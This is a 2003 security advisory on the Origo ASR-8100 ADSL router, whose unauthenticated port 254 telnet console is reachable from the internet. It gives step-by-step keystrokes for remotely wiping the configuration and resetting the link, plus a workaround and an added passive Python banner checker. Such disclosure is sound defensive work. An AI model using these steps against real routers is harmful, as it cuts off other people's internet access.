[NEWS] Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
From: SecuriTeam (support_at_securiteam.com)
Date: 10/23/03
To: list@securiteam.com Date: 23 Oct 2003 17:46:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
------------------------------------------------------------------------
SUMMARY
The Origo ASR-8100 ADSL device can be remotely reset to factory settings,
allowing a permanent denial of service attack until it is reconfigured
manually by an operator. The effect only appears after the device is next
reset, which may be some time after the attack has been performed. PPP
authentication information is lost on reset to factory settings, so it is
most likely that the device will be unable to establish a WAN link after
reset.
The ADSL link can also be remotely reset, causing temporary DoS and (if
DHCP is used) its IP address to change.
Neither of these requires any special privileges (no administrative
password is required).
DETAILS
A telnet-style configuration interface is left open on the WAN interface
on port 254, without any form of protection (no password protection).
Workaround:
Forwarding external port 254 to an internal port that is unused prevents
access to the configuration interface.
This can be done via the web interface by going to:
  http://router-ip/doc/advance.htm
Click on Configuration: Virtual server
Enter a new entry:
  Public port: 254
  Private port: 9876
  TCP
  Host IP address: 127.0.0.1
Click 'Add this setting', then go to Configuration: Save Settings/Reboot and
click 'Save & Reboot'
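A way to confirm the workaround took effect, as an added example that is not part of the original advisory: run from a host outside the LAN against your own router's WAN address, it connects to port 254, reads passively without sending anything, and reports whether the console banner quoted in this advisory still appears. The function names and state labels are illustrative choices, and the sample banner is constructed from the lines quoted below.

```python
import socket
import sys

# Strings from the console banner quoted in the advisory.
MARKERS = (b"CONEXANT SYSTEMS", b"ACCESS RUNNER", b"LOGIN PASSWORD>")

# Constructed sample, assembled from the banner lines quoted in the advisory.
SAMPLE_BANNER = (b"01/01/99 CONEXANT SYSTEMS, INC.\r\n00:04:10\r\n"
                 b"ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)\r\n"
                 b"LOGIN PASSWORD>")

def classify_banner(data: bytes) -> str:
    """Classify bytes read from the port; nothing is ever sent to the peer."""
    if any(marker in data.upper() for marker in MARKERS):
        return "exposed"           # configuration console is still reachable
    return "unknown-service" if data else "no-banner"

def check_port_254(host: str, port: int = 254, timeout: float = 5.0) -> str:
    """Connect to the console port, read passively, report its state."""
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            try:
                while len(data) < 1024 and b"PASSWORD>" not in data.upper():
                    chunk = sock.recv(256)
                    if not chunk:
                        break
                    data += chunk
            except OSError:
                pass               # read timeout or reset: judge what arrived
    except ConnectionRefusedError:
        return "closed"            # nothing listening behind the forward
    except OSError:
        return "filtered"          # timed out or unreachable
    return classify_banner(data)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: check254.py <WAN address of your own router>")
    state = check_port_254(sys.argv[1])
    print(f"tcp/254: {state}")
    sys.exit(1 if state == "exposed" else 0)
```

Any result other than "exposed" means the configuration console did not answer on the WAN side; re-run the check after each reboot, since a factory reset also discards the virtual server entry.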
Exploit:
From any Internet connected host:
telnet <router global IP address> 254
Returns a menu:
01/01/99 CONEXANT SYSTEMS, INC.
00:04:10
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
You are prompted for a LOGIN PASSWORD>
Just press return
Brings up MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
4. REMOTE LOGON
Origo Reset:
Press 1 - get to SYSTEM STATUS AND CONFIGURATION
1. SYSTEM INFORMATION
2. SYSTEM CONFIGURATION
Press 2 - get to SYSTEM CONFIGURATION
1. CHANGE SYSTEM TIME
2. CHANGE SYSTEM DATE
3. CHANGE PASSWORD
4. FACTORY DEFAULT CONFIGURATION
Type 1 hh:mm:ss to reset the system time
Type 2 dd/mm/yy to reset the system date
(Option 3 doesn't work)
Type 4: Prompt: This will reset all the configurations and the ADSL modem.
Are you sure?(Y/N)
Type Y: Message: NVRAM updated
This does not reset the ADSL modem, only clears the NVRAM. This takes
effect the next time the modem is reset: the admin password is reset to
that printed in the documentation, and the ADSL username/password are
reset, meaning the connection is down permanently until a human sets them
up again. Any other settings (security etc) are also lost.
ADSL Link Reset:
From main menu, type 2 to get to ADSL MENU
1. ADSL PERFORMANCE STATUS
2. 24 HOUR ADSL PERFORMANCE HISTORY
3. 7 DAY ADSL PERFORMANCE HISTORY
4. ADSL ALARM HISTORY
5. ADSL TRANSCEIVER CONFIGURATION MENU
6. ADSL LINK RESET
Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
Type Y. The ADSL link is reset and a new WAN IP address is requested by
DHCP (if the ISP uses it).
Vendor Status:
UK support for the vendor (support@adsltech.com) was notified on 30th August
2003 - the entirety of the reply message was 'Thanks a lot'. The vendor does
not advertise email addresses, so it was notified via web form on that date -
no response was received. To date the vendor has not advertised any patches or
new firmware.
ADDITIONAL INFORMATION
The information has been provided by Theo Markettos
(theo_@_markettos.org.uk).